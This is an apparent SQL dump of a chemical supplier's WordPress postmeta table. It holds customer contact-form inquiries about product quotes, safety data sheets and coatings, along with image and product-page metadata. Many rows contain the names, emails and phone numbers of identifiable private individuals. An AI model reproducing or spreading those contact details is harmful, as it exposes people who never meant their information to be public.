INSERT INTO `wp_postmeta` VALUES (36907, 4141, '_field_3', 'TOP URGENT\n\nPlease see our below inquiry and request you to quote a.s.a.p. your best ex-works prices valid 60 days.\n\n20  PC\nHOLDER,\nPARENT EQUIPMENT/FUNCTION:\nREUSABLE SAMPLE,LABORATORY OPTICAL SPECTROMETER;\nSIZE:\n15.5 MM ID X 19.5 MM OD X 9 MM LG;\nMATERIAL:\nWHITE PLASTIC;\nMILLER STEPHENSON CHEMICAL CO.:\nP/N#M90202\n\nThanks &amp; best regards\nWasim\n \nA. Winkel-Nayyar Trading GmbH\nSiemensstr. 38\nD-59199 Boenen\nGermany\n \nPhone: +49 (0)2383 93654-0\nFax: +49 (0)2383 93654-20/-21\n \nwasim.akbar@winkel-nayyar.com\nhttp://www.winkel-nayyar.com\n 	 \n\n\n'); 
INSERT INTO `wp_postmeta` VALUES (36908, 4141, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36909, 4141, '_sub_id', '4141'); 
INSERT INTO `wp_postmeta` VALUES (36910, 4142, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (36911, 4142, '_seq_num', '285'); 
INSERT INTO `wp_postmeta` VALUES (36912, 4142, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36913, 4142, '_field_12', 'Zayyan Chowdhury'); 
INSERT INTO `wp_postmeta` VALUES (36914, 4142, '_field_13', 'Miller-Stephenson Chemical Co.'); 
INSERT INTO `wp_postmeta` VALUES (36915, 4142, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (36916, 4142, '_field_14', 'zchowdhury@mschem.com'); 
INSERT INTO `wp_postmeta` VALUES (36917, 4142, '_field_15', '(203) 743-4447'); 
INSERT INTO `wp_postmeta` VALUES (36918, 4142, '_field_16', 'testestest'); 
INSERT INTO `wp_postmeta` VALUES (36919, 4142, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (36920, 4142, '_sub_id', '4142'); 
INSERT INTO `wp_postmeta` VALUES (36921, 4143, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36922, 4143, '_seq_num', '604'); 
INSERT INTO `wp_postmeta` VALUES (36923, 4143, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36924, 4143, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36925, 4143, '_field_1', 'Analisa Hubac'); 
INSERT INTO `wp_postmeta` VALUES (36926, 4143, '_field_10', 'Magellan Aerospace'); 
INSERT INTO `wp_postmeta` VALUES (36927, 4143, '_field_2', 'analisa.hubac@magellan.aero'); 
INSERT INTO `wp_postmeta` VALUES (36928, 4143, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (36929, 4143, '_field_3', 'Requesting for updated MS-143TE SDS'); 
INSERT INTO `wp_postmeta` VALUES (36930, 4143, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36931, 4143, '_sub_id', '4143'); 
INSERT INTO `wp_postmeta` VALUES (36932, 4144, '_wp_attached_file', '2017/05/wire-test.jpg'); 
INSERT INTO `wp_postmeta` VALUES (36933, 4144, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:21:"2017/05/wire-test.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"wire-test-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"wire-test-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"wire-test-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"wire-test-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"wire-test-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"wire-test-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"wire-test-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (36934, 4151, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36935, 4151, '_seq_num', '605'); 
INSERT INTO `wp_postmeta` VALUES (36936, 4151, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36937, 4151, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36938, 4151, '_field_1', 'Sheril Ladiero '); 
INSERT INTO `wp_postmeta` VALUES (36939, 4151, '_field_10', 'Serenity Technologies'); 
INSERT INTO `wp_postmeta` VALUES (36940, 4151, '_field_2', 'sheril@serenitytechnology.com'); 
INSERT INTO `wp_postmeta` VALUES (36941, 4151, '_field_8', '(951) 587-3753'); 
INSERT INTO `wp_postmeta` VALUES (36942, 4151, '_field_3', 'Our company uses your Vertrel MS-897 for one of our processes and we need the Materials Safety Data Sheet for our records and for waste pick-up. If you can send it via email would be great. Thank you'); 
INSERT INTO `wp_postmeta` VALUES (36943, 4151, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36944, 4151, '_sub_id', '4151'); 
INSERT INTO `wp_postmeta` VALUES (36945, 4155, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36946, 4155, '_seq_num', '606'); 
INSERT INTO `wp_postmeta` VALUES (36947, 4155, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36948, 4155, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36949, 4155, '_field_1', 'VEENA'); 
INSERT INTO `wp_postmeta` VALUES (36950, 4155, '_field_10', 'ARON UNIVERSAL LTD'); 
INSERT INTO `wp_postmeta` VALUES (36951, 4155, '_field_2', 'veena@aronuniversal.com'); 
INSERT INTO `wp_postmeta` VALUES (36952, 4155, '_field_8', '(934) 371-5493'); 
INSERT INTO `wp_postmeta` VALUES (36953, 4155, '_field_3', 'We are one of the leading manufacturers in India of daylight fluorescent pigments, fluorescent Ink concentrates (for offset and lithographic printing) and  fluorescent dispersions ,  catering to  major applications in inks, textile, plastics, paper, rubber and paints industries .\nWe are looking for  2,2&#039;-Azobis (4-methoxy-2,4-dimethylpentanenitrile) for our new product development.  Request you to organize  500gms  to 1 kg of free  sample along with MSDS, TDS and COA of the same in order evaluate your material and  use in our application test.\nOnce the material is approved we would go for the bulk quantity.  Please also indicate your pack size and quote for the same along with required lead time.\nYour immediate action in the matter is highly appreciated.\n'); 
INSERT INTO `wp_postmeta` VALUES (36954, 4155, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36955, 4155, '_sub_id', '4155'); 
INSERT INTO `wp_postmeta` VALUES (36961, 2474, '_yoast_wpseo_opengraph-image', 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_72593680.jpg'); 
INSERT INTO `wp_postmeta` VALUES (36962, 2474, '_yoast_wpseo_twitter-image', 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_72593680.jpg'); 
INSERT INTO `wp_postmeta` VALUES (36963, 4159, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36964, 4159, '_seq_num', '607'); 
INSERT INTO `wp_postmeta` VALUES (36965, 4159, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36966, 4159, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36967, 4159, '_field_1', 'xinhong'); 
INSERT INTO `wp_postmeta` VALUES (36968, 4159, '_field_10', 'INM'); 
INSERT INTO `wp_postmeta` VALUES (36969, 4159, '_field_2', 'xiongxinhongsd@163.com'); 
INSERT INTO `wp_postmeta` VALUES (36970, 4159, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (36971, 4159, '_field_3', 'I want to know whether you can provide the Krytox with COOH group, maybe it&#039;s not named Krytox. I have bought Krytox 157FSL, but the molecule weight is too high, I need a smaller one, the molecule weight is about 800-1000g/mol. If you have smaller one please contact me. Thank you very much.'); 
INSERT INTO `wp_postmeta` VALUES (36972, 4159, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36973, 4159, '_sub_id', '4159'); 
INSERT INTO `wp_postmeta` VALUES (36974, 4160, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36975, 4160, '_seq_num', '608'); 
INSERT INTO `wp_postmeta` VALUES (36976, 4160, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36977, 4160, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36978, 4160, '_field_1', 'Casey K. Wong'); 
INSERT INTO `wp_postmeta` VALUES (36979, 4160, '_field_10', 'Japak Industries Inc.'); 
INSERT INTO `wp_postmeta` VALUES (36980, 4160, '_field_2', 'casey@japak.com'); 
INSERT INTO `wp_postmeta` VALUES (36981, 4160, '_field_8', '(604) 298-3000'); 
INSERT INTO `wp_postmeta` VALUES (36982, 4160, '_field_3', 'Interested to waterproof PCB in house.'); 
INSERT INTO `wp_postmeta` VALUES (36983, 4160, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36984, 4160, '_sub_id', '4160'); 
INSERT INTO `wp_postmeta` VALUES (36985, 4161, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36986, 4161, '_seq_num', '609'); 
INSERT INTO `wp_postmeta` VALUES (36987, 4161, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36988, 4161, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36989, 4161, '_field_1', 'WANG YIYI'); 
INSERT INTO `wp_postmeta` VALUES (36990, 4161, '_field_10', 'HONEYWELL XIAMEN'); 
INSERT INTO `wp_postmeta` VALUES (36991, 4161, '_field_2', 'YIYI.WANG@HONEYWELL.COM'); 
INSERT INTO `wp_postmeta` VALUES (36992, 4161, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (36993, 4161, '_field_3', 'Hi sir,\nI would like to order the RE-NU MS930/CO2 cleaner , but I can&#039;t find this production in your web, could you advise which cleaner has replaced  cleaner MS 930, thank you. '); 
INSERT INTO `wp_postmeta` VALUES (36994, 4161, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36995, 4161, '_sub_id', '4161'); 
INSERT INTO `wp_postmeta` VALUES (36996, 4162, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36997, 4162, '_seq_num', '610'); 
INSERT INTO `wp_postmeta` VALUES (36998, 4162, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36999, 4162, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37000, 4162, '_field_1', 'sudarshan patidar'); 
INSERT INTO `wp_postmeta` VALUES (37001, 4162, '_field_10', 'shakti pumps india ltd.'); 
INSERT INTO `wp_postmeta` VALUES (37002, 4162, '_field_2', 'sudarshan@shaktipumps.com'); 
INSERT INTO `wp_postmeta` VALUES (37003, 4162, '_field_8', '07292410500'); 
INSERT INTO `wp_postmeta` VALUES (37004, 4162, '_field_3', 'Dear Sir,\r\n\r\nGreetings from Shakti Pumps (I) Ltd!\r\n\r\nWe are pleased to introduce ourselves one of the leading manufacturers\r\nof stainless steel submersible pumps in India. We are a listed public\r\nlimited company with Bombay Stock Exchange. We constantly strive to\r\nimprove quality and standards of our products to ensure greater\r\nacceptability and brand image.\r\n\r\nWe are proud to state that we are the only one submersible pump\r\nmanufacturer who has highest number of 5-star rated pump models to its\r\ncredit which reflects our sincere efforts and initiatives for the\r\ncause of energy efficiency.\r\n\r\nConsequent to superior quality and unique energy efficiency features,\r\nwe had been chosen as the first submersible pump manufacturer to\r\naccredit with 5-Star rating by Bureau of Energy Efficiency. Coupled\r\nsuperior quality and strong marketing network, our products are well\r\nreceived in the domestic as well as in international markets. We\r\nexport our products to more than 60 countries across the world. The\r\ncompany has strong foothold in the domestic market with a established\r\nnetwork of dealers.\r\n\r\nWe have regular and bulk requirement of EPOXY RESIN &amp; HARDENER FOR ENCAPSULATE\r\n\r\nSUBMERSIBLE WATER WELL MOTOR RATING OF MOTOR 0.5HP.TO 50H.P. TEMP. OF OUR\r\n\r\nMOTOR IS 65 DEGREE. PER MONTH PRODUCE 5000 NOS REQUIRED QTY OF EPOXY RESIN\r\n6MT. PLEASE GIVE ME THE BEST OFFER AND TECHNICAL DATA SHEET FOR THE\r\n\r\nSAME  . WE REQUIRED TWO PART EPOXY SYSTEM RESIN &amp; HARDENERS REQUIRED\r\n\r\nTG 130 DEGREE\r\n\r\n\r\n\r\nAwaiting for your positive reply.\r\n\r\n--\r\n--\r\nBest Regards\r\n\r\nSudarshan Patidar\r\nAGM VD ( Direct )\r\n\r\nShakti Pumps [India] Limited\r\nPlot No 401, 402 &amp; 413 Industrial Area, Sector 3\r\nPithampur-454775, Dist. Dhar (MP) India\r\nMobile: +91-7869959697\r\nTel:+91 7292 410500\r\nFax: +91 7292 407044 / 400371\r\n\r\nWeb : *www.shaktipumps.com *\r\n'); 
INSERT INTO `wp_postmeta` VALUES (37005, 4162, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37006, 4162, '_sub_id', '4162'); 
INSERT INTO `wp_postmeta` VALUES (37007, 4163, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37008, 4163, '_seq_num', '611'); 
INSERT INTO `wp_postmeta` VALUES (37009, 4163, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37010, 4163, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37011, 4163, '_field_1', 'Eric Siegfried'); 
INSERT INTO `wp_postmeta` VALUES (37012, 4163, '_field_10', 'Chemours'); 
INSERT INTO `wp_postmeta` VALUES (37013, 4163, '_field_2', 'eric.k.siegfried@chemours.com'); 
INSERT INTO `wp_postmeta` VALUES (37014, 4163, '_field_8', '(302) 353-5946'); 
INSERT INTO `wp_postmeta` VALUES (37015, 4163, '_field_3', 'I would like pricing and availability for 110 kg of  Suprion packaged in 1 gallon bottles (your standard container this size)'); 
INSERT INTO `wp_postmeta` VALUES (37016, 4163, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37017, 4163, '_sub_id', '4163'); 
INSERT INTO `wp_postmeta` VALUES (37018, 4166, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (37019, 4166, '_seq_num', '286'); 
INSERT INTO `wp_postmeta` VALUES (37020, 4166, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37021, 4166, '_field_12', 'jihad fayad'); 
INSERT INTO `wp_postmeta` VALUES (37022, 4166, '_field_13', 'masco middle east airlines'); 
INSERT INTO `wp_postmeta` VALUES (37023, 4166, '_field_18', '7009900'); 
INSERT INTO `wp_postmeta` VALUES (37024, 4166, '_field_14', 'fayadj@masco.com.lb'); 
INSERT INTO `wp_postmeta` VALUES (37025, 4166, '_field_15', '(961) 361-0483'); 
INSERT INTO `wp_postmeta` VALUES (37026, 4166, '_field_16', 'good day.\nis there a shelf life date for your product MS-530\nthank you'); 
INSERT INTO `wp_postmeta` VALUES (37027, 4166, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (37028, 4166, '_sub_id', '4166'); 
INSERT INTO `wp_postmeta` VALUES (37029, 4167, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37030, 4167, '_seq_num', '612'); 
INSERT INTO `wp_postmeta` VALUES (37031, 4167, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37032, 4167, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37033, 4167, '_field_1', 'Tristan Dupeux'); 
INSERT INTO `wp_postmeta` VALUES (37034, 4167, '_field_10', 'BASF Polyurethanes'); 
INSERT INTO `wp_postmeta` VALUES (37035, 4167, '_field_2', 'tristan.dupeux@basf.com'); 
INSERT INTO `wp_postmeta` VALUES (37036, 4167, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (37037, 4167, '_field_3', 'Dear Mrs. And Mr.,\n\nI am Tristan Dupeux and I work for BASF Polyurethanes in Lemförde (Germany) in development product. I am currently working to find a good release agent for our TPU. \n\nI saw on your website that you proposed release agents (RA) for plastics. Do you know if your RA are good for Thermoplastic PolyUrethane (TPU) for ester and ether based TPU? \nI saw on your Website this product, ReleaSys 8900, which coule be really interesting for us because you said it is ideal for Urethane and for complex mold geometry.\nI am currently searching a RA which can survive to high temperature (200°C – 300°C) and propose a long efficient time of unmolding. We would also prefer to work with water-based release agent but we are open to every proposition from release agent expert. \n\nDo you have some supplier in Europe?\n\nI am looking forward to hearing from you and I stay at your disposal for further questions.  \n\nThank you.\nBest Regard.\n\nTristan Dupeux\n+49 5443 12-4748\n'); 
INSERT INTO `wp_postmeta` VALUES (37038, 4167, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37039, 4167, '_sub_id', '4167'); 
INSERT INTO `wp_postmeta` VALUES (37040, 4168, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37041, 4168, '_seq_num', '613'); 
INSERT INTO `wp_postmeta` VALUES (37042, 4168, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37043, 4168, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37044, 4168, '_field_1', 'Lily Li'); 
INSERT INTO `wp_postmeta` VALUES (37045, 4168, '_field_10', 'Toronto Transit Commission'); 
INSERT INTO `wp_postmeta` VALUES (37046, 4168, '_field_2', 'lily.li@ttc.ca'); 
INSERT INTO `wp_postmeta` VALUES (37047, 4168, '_field_8', '(416) 338-6387'); 
INSERT INTO `wp_postmeta` VALUES (37048, 4168, '_field_3', 'Hi,\r\n  I would like to request the most recent SDS for the Anti-Static Quik-Freeze (MS-242N-AS) in English. Thank you.\r\n\r\nRegards,\r\nLily'); 
INSERT INTO `wp_postmeta` VALUES (37049, 4168, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37050, 4168, '_sub_id', '4168'); 
INSERT INTO `wp_postmeta` VALUES (37051, 4169, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37052, 4169, '_seq_num', '614'); 
INSERT INTO `wp_postmeta` VALUES (37053, 4169, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37054, 4169, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37055, 4169, '_field_1', 'Lena Alston'); 
INSERT INTO `wp_postmeta` VALUES (37056, 4169, '_field_10', 'Smarter Tactics'); 
INSERT INTO `wp_postmeta` VALUES (37057, 4169, '_field_2', 'lenaalston.smartertactics@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (37058, 4169, '_field_8', '877-228-1545'); 
INSERT INTO `wp_postmeta` VALUES (37059, 4169, '_field_3', 'Hi,\r\n \r\nFrom what I can tell, you are doing a lot of great marketing, but around 98 per cent of leads to your website are leaving without taking any action on your site. I can show you how, through reverse IP lookup, we can identify the companies and individuals visiting your site. I can also provide you with the contact info - including names, emails and phone numbers - of these visitors, effectively doubling or tripling the number of leads that can be harvested from your existing web traffic.\r\n \r\nMy team has over twelve years of experience driving results for our clients, and we want you to be a part of their long reputation for success. We&#039;re based in Los Angeles, we&#039;re Google partners, and we&#039;ve received accolades from Inc Magazine and the LA Business Journal. \r\n \r\nIs there a time this week that works best to set up a call?\r\n\r\nBest,\r\n\r\nLena Alston\r\nDigital Marketing Manager\r\n(877)-228-1545\r\nSmarter Tactics\r\nDigital Marketing | AdWords Management | Content &amp; Social | Influencer Marketing'); 
INSERT INTO `wp_postmeta` VALUES (37060, 4169, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37061, 4169, '_sub_id', '4169'); 
INSERT INTO `wp_postmeta` VALUES (37062, 4170, '_edit_lock', '1498438272:3'); 
INSERT INTO `wp_postmeta` VALUES (37063, 4170, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (37064, 4170, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (37065, 4170, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (37066, 4170, '312_default_editor', '<p class="Body"><strong><span class="C-12">Fluoropolymer Medical Coatings:</span></strong></p>\r\n<p class="Body"><span class="C-8">Our PTFE-<wbr />coatings are optimized to provide superior adhesion to stainless steel guidewires and other metal wire.  No other product on the market can match the adhesion characteristics and durability of our coating technology.  These formulations generate very uniform, thin films (5-<wbr />10 microns) which exceed all ISO and ASTM requirements. Extremely Low coefficient of friction tested by <span class="C-14">ASTM 1894</span><span class="C-14">; ASTM D3359 Adhesion Test; ISO 7802 Wire Wrap Test; ISO Corrosion Resistance Test</span></span></p>\r\n<p class="Body"><strong><span class="C-12">Usage Recommendations:</span></strong></p>\r\n<p class="Body"><span class="C-8">Miller-<wbr />Stephenson\'s Fluoropolymer coatings can be applied via spray or dip methods.  Proper post-<wbr />application curing equipment is critical to guarantee performance and durability. Acceptable curing equipment include high temperature ovens which can safely maintain temperatures of 400-<wbr />800 degree Fahrenheit or IR ovens.</span></p>'); 
INSERT INTO `wp_postmeta` VALUES (37067, 4170, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (37068, 4170, '1367_default_editor', '<ul>\r\n 	<li><strong>Water-based; Non Cr(VI) One Coat System</strong></li>\r\n 	<li><strong>Water-based; Non Cr(VI) One Coat System (Low-Bake)</strong> Ideal for Nitinol</li>\r\n 	<li><strong>Water-based; Non Cr(VI) Two-Coat System</strong></li>\r\n 	<li><strong>Water-based; Acid Primer One Coat</strong></li>\r\n 	<li><strong>Solvent-based;</strong> <strong>Non Cr(VI) Two-Coat System</strong></li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (37069, 4170, '719_default_editor', 'These formulations generate very uniform, thin films (5-<wbr />10 microns) which exceed all ISO and ASTM requirements.\r\n<ul>\r\n 	<li><span class="C-14">ASTM 1894 Coefficient of Friction</span></li>\r\n 	<li><span class="C-14">ASTM D3359 Adhesion Test</span></li>\r\n 	<li><span class="C-14">ISO 7802 Wire Wrap Test</span></li>\r\n 	<li><span class="C-14">ISO 11070 Corrosion Resistance Test.</span></li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (37070, 4170, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (37071, 4170, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (37072, 4170, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (37073, 4170, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (37074, 4170, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (37075, 4170, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (37076, 4170, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (37077, 4170, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (37078, 4170, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (37079, 4170, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (37080, 4170, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (37081, 4170, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (37082, 4170, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (37083, 4170, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (37084, 4170, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (37085, 4170, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (37086, 4170, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (37087, 4170, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (37088, 4170, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (37089, 4170, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (37090, 4170, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (37091, 4170, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (37092, 4170, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (37093, 4170, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (37094, 4170, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (37095, 4170, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (37096, 4170, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (37097, 4170, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (37098, 4170, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (37099, 4170, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (37100, 4170, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (37101, 4170, '_yoast_wpseo_primary_product_cat', '523'); 
INSERT INTO `wp_postmeta` VALUES (37102, 4170, '_yoast_wpseo_focuskw_text_input', 'PTFE Medical Coatings'); 
INSERT INTO `wp_postmeta` VALUES (37103, 4170, '_yoast_wpseo_focuskw', 'PTFE Medical Coatings'); 
INSERT INTO `wp_postmeta` VALUES (37104, 4170, '_yoast_wpseo_title', 'PTFE Medical Coatings | Waterbased One-Coat | Medical Guidewire Coatings'); 
INSERT INTO `wp_postmeta` VALUES (37105, 4170, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (37106, 4170, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (37107, 4172, '_wp_attached_file', '2017/05/MEdical-PTFE.jpg'); 
INSERT INTO `wp_postmeta` VALUES (37108, 4172, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:24:"2017/05/MEdical-PTFE.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"MEdical-PTFE-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:24:"MEdical-PTFE-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"MEdical-PTFE-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:24:"MEdical-PTFE-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"MEdical-PTFE-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:24:"MEdical-PTFE-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:24:"MEdical-PTFE-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (37109, 4172, '_wp_attachment_image_alt', 'PTFE Medical Coatings'); 
INSERT INTO `wp_postmeta` VALUES (37110, 4170, '_thumbnail_id', '4172'); 
